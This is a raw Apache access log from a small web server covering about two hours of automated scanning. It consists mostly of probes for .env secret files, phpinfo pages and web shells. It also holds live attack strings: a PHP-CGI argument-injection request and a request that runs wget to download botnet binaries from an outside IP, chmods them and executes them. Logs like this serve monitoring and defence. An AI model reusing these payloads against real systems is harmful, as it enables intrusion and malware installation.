91.238.181.32 - - [07/Feb/2025:21:43:21 +0200] "\x03" 400 226 "-" "-"
46.19.138.234 - - [07/Feb/2025:21:48:13 +0200] "GET / HTTP/1.1" 200 385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.162.151.158 - - [07/Feb/2025:21:48:48 +0200] "GET /development/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:21:48:48 +0200] "POST /development/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
185.12.59.118 - - [07/Feb/2025:21:50:44 +0200] "GET / HTTP/1.1" 200 385 "-" "-"
43.159.135.203 - - [07/Feb/2025:21:51:07 +0200] "GET /?C=S;O=A HTTP/1.1" 200 383 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
::1 - - [07/Feb/2025:21:53:40 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:21:53:41 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:21:53:42 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:21:53:43 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:21:53:44 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
212.162.151.158 - - [07/Feb/2025:21:55:49 +0200] "GET /admin-app/.env HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:21:55:49 +0200] "POST /admin-app/.env HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
43.153.47.201 - - [07/Feb/2025:21:58:51 +0200] "GET /?C=N;O=A HTTP/1.1" 200 385 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
13.70.193.116 - - [07/Feb/2025:21:59:05 +0200] "HEAD /wordpress HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.70.193.116 - - [07/Feb/2025:21:59:05 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.70.193.116 - - [07/Feb/2025:21:59:05 +0200] "HEAD /wp HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.70.193.116 - - [07/Feb/2025:21:59:05 +0200] "HEAD /bc HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.70.193.116 - - [07/Feb/2025:21:59:05 +0200] "HEAD /bk HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.70.193.116 - - [07/Feb/2025:21:59:05 +0200] "HEAD /backup HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.70.193.116 - - [07/Feb/2025:21:59:05 +0200] "HEAD /old HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.70.193.116 - - [07/Feb/2025:21:59:05 +0200] "HEAD /new HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.70.193.116 - - [07/Feb/2025:21:59:05 +0200] "HEAD /main HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.70.193.116 - - [07/Feb/2025:21:59:05 +0200] "HEAD /home HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
212.162.151.158 - - [07/Feb/2025:21:59:21 +0200] "GET /api/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:21:59:21 +0200] "POST /api/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
114.119.137.232 - - [07/Feb/2025:22:05:00 +0200] "GET /portal/checkFavorites/46?t=item HTTP/1.1" 404 222 "http://coursearena.com/course/46" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
212.162.151.158 - - [07/Feb/2025:22:06:20 +0200] "GET /app/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:06:21 +0200] "POST /app/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
94.103.83.173 - - [07/Feb/2025:22:06:41 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
212.162.151.158 - - [07/Feb/2025:22:09:55 +0200] "GET /system/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:09:55 +0200] "POST /system/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
43.134.66.205 - - [07/Feb/2025:22:13:25 +0200] "GET /?C=S;O=D HTTP/1.1" 200 383 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
37.139.53.80 - - [07/Feb/2025:22:14:09 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
101.198.0.188 - - [07/Feb/2025:22:16:38 +0200] "\x16\x03\x01\x018\x01" 400 226 "-" "-"
212.162.151.158 - - [07/Feb/2025:22:17:02 +0200] "GET /fedex/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:17:02 +0200] "POST /fedex/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
37.139.53.80 - - [07/Feb/2025:22:19:15 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.162.151.158 - - [07/Feb/2025:22:20:28 +0200] "GET /cp/.env HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:20:28 +0200] "POST /cp/.env HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
80.82.77.202 - - [07/Feb/2025:22:21:11 +0200] "GET / HTTP/1.0" 200 902 "-" "Mozilla/5.0 (Linux; Android 6.0.1; ONE E1003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36"
212.162.151.158 - - [07/Feb/2025:22:23:51 +0200] "GET /private/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:23:51 +0200] "POST /private/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:27:19 +0200] "GET /local/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:27:19 +0200] "POST /local/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:30:53 +0200] "GET /.env.production HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:30:53 +0200] "POST /.env.production HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
192.42.116.191 - - [07/Feb/2025:22:36:24 +0200] "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 404 217 "-" "python-requests/2.32.3"
212.162.151.158 - - [07/Feb/2025:22:41:24 +0200] "GET /back/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:41:25 +0200] "POST /back/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
173.245.207.27 - - [07/Feb/2025:22:42:10 +0200] "GET / HTTP/1.1" 200 385 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1"
109.61.205.38 - - [07/Feb/2025:22:42:26 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
212.162.151.158 - - [07/Feb/2025:22:44:56 +0200] "GET /shared/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:44:56 +0200] "POST /shared/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
::1 - - [07/Feb/2025:22:46:08 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:22:46:09 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:22:46:10 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
78.153.140.149 - - [07/Feb/2025:22:46:56 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.149 - - [07/Feb/2025:22:46:56 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
212.162.151.158 - - [07/Feb/2025:22:48:33 +0200] "GET /sources/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:48:33 +0200] "POST /sources/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:52:04 +0200] "GET /.env.development HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:52:05 +0200] "POST /.env.development HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
37.139.53.80 - - [07/Feb/2025:22:54:52 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
212.162.151.158 - - [07/Feb/2025:22:55:29 +0200] "GET /enviroments/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:22:55:29 +0200] "POST /enviroments/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
37.139.53.80 - - [07/Feb/2025:22:59:27 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
64.23.149.203 - - [07/Feb/2025:23:01:20 +0200] "GET / HTTP/1.1" 200 385 "-" "Mozilla/5.0 (compatible)"
64.23.149.203 - - [07/Feb/2025:23:01:20 +0200] "GET /favicon.ico HTTP/1.1" 404 209 "http://madareshub.com/" "Mozilla/5.0 (compatible)"
170.64.190.83 - - [07/Feb/2025:23:02:12 +0200] "\x16\x03\x01" 400 226 "-" "-"
170.64.190.83 - - [07/Feb/2025:23:02:13 +0200] "\x16\x03\x01" 400 226 "-" "-"
170.64.190.83 - - [07/Feb/2025:23:02:13 +0200] "GET / HTTP/1.1" 200 385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.190.83 - - [07/Feb/2025:23:02:14 +0200] "GET /form.html HTTP/1.1" 404 207 "-" "curl/8.1.2"
170.64.190.83 - - [07/Feb/2025:23:02:14 +0200] "GET /upl.php HTTP/1.1" 404 16 "-" "Mozilla/5.0"
170.64.190.83 - - [07/Feb/2025:23:02:15 +0200] "GET /t4 HTTP/1.1" 404 200 "-" "Mozilla/5.0"
170.64.190.83 - - [07/Feb/2025:23:02:16 +0200] "GET /geoip/ HTTP/1.1" 404 204 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.190.83 - - [07/Feb/2025:23:02:16 +0200] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.190.83 - - [07/Feb/2025:23:02:17 +0200] "GET /1.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.190.83 - - [07/Feb/2025:23:02:17 +0200] "GET /systembc/password.php HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.190.83 - - [07/Feb/2025:23:02:18 +0200] "GET /password.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.162.151.158 - - [07/Feb/2025:23:02:31 +0200] "GET /.env.project HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:23:02:31 +0200] "POST /.env.project HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
51.8.102.237 - - [07/Feb/2025:23:05:22 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
141.98.11.35 - - [07/Feb/2025:23:05:28 +0200] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+efefa7;wget+http:/\\/176.65.140.135/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\\/176.65.140.135/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1" 404 203 "-" "KrebsOnSecurity"
93.174.93.12 - - [07/Feb/2025:23:05:34 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
212.162.151.158 - - [07/Feb/2025:23:06:07 +0200] "GET /.env.dist HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:23:06:08 +0200] "POST /.env.dist HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
103.131.71.26 - - [07/Feb/2025:23:07:45 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
::1 - - [07/Feb/2025:23:08:41 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:23:08:44 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
212.162.151.158 - - [07/Feb/2025:23:09:26 +0200] "GET /.env.prod HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:23:09:26 +0200] "POST /.env.prod HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
::1 - - [07/Feb/2025:23:10:42 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:23:10:43 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:23:10:44 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:23:10:45 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:23:10:47 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:23:10:52 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:23:10:53 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
212.162.151.158 - - [07/Feb/2025:23:12:42 +0200] "GET /rest/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:23:12:42 +0200] "POST /rest/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:23:16:09 +0200] "GET /.env.old HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:23:16:10 +0200] "POST /.env.old HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
37.111.174.174 - - [07/Feb/2025:23:18:56 +0200] "-" 408 - "-" "-"
193.41.206.176 - - [07/Feb/2025:23:21:47 +0200] "GET /.env HTTP/1.1" 404 202 "-" "-"
193.41.206.176 - - [07/Feb/2025:23:22:04 +0200] "GET /pinfo.php HTTP/1.1" 404 16 "-" "-"
193.41.206.176 - - [07/Feb/2025:23:22:31 +0200] "GET /old_phpinfo.php HTTP/1.1" 404 16 "-" "-"
193.41.206.176 - - [07/Feb/2025:23:22:49 +0200] "GET /php-info.php HTTP/1.1" 404 16 "-" "-"
193.41.206.176 - - [07/Feb/2025:23:23:07 +0200] "GET /phpinfo.php3 HTTP/1.1" 404 210 "-" "-"
124.48.156.57 - - [07/Feb/2025:23:27:54 +0200] "GET / HTTP/1.0" 200 902 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
51.8.102.207 - - [07/Feb/2025:23:31:27 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
85.208.96.206 - - [07/Feb/2025:23:32:06 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.203 - - [07/Feb/2025:23:32:07 +0200] "GET /ar/user/4 HTTP/1.1" 404 207 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
37.139.53.80 - - [07/Feb/2025:23:35:19 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
178.62.216.207 - - [07/Feb/2025:23:36:51 +0200] "GET / HTTP/1.1" 200 382 "-" "Mozilla/5.0 zgrab/0.x"
212.162.151.158 - - [07/Feb/2025:23:36:58 +0200] "GET /cms/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:23:36:58 +0200] "POST /cms/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
37.139.53.80 - - [07/Feb/2025:23:39:23 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
43.135.145.117 - - [07/Feb/2025:23:42:07 +0200] "GET /?C=S;O=D HTTP/1.1" 200 381 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
172.86.96.195 - - [07/Feb/2025:23:43:01 +0200] "GET /wp-content/plugins/about.php HTTP/1.1" 404 226 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
172.86.96.195 - - [07/Feb/2025:23:43:32 +0200] "GET /geju.php HTTP/1.1" 404 16 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
172.86.96.195 - - [07/Feb/2025:23:44:01 +0200] "GET /wp.php HTTP/1.1" 404 16 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
212.162.151.158 - - [07/Feb/2025:23:44:07 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:23:44:07 +0200] "POST /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
::1 - - [07/Feb/2025:23:46:41 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
212.162.151.158 - - [07/Feb/2025:23:47:46 +0200] "GET /.env.save HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:23:47:47 +0200] "POST /.env.save HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
185.196.220.253 - - [07/Feb/2025:23:49:26 +0200] "GET / HTTP/1.1" 200 902 "-" "Hello World"
212.162.151.158 - - [07/Feb/2025:23:53:06 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.162.151.158 - - [07/Feb/2025:23:55:19 +0200] "GET /enviroments/.env.production HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
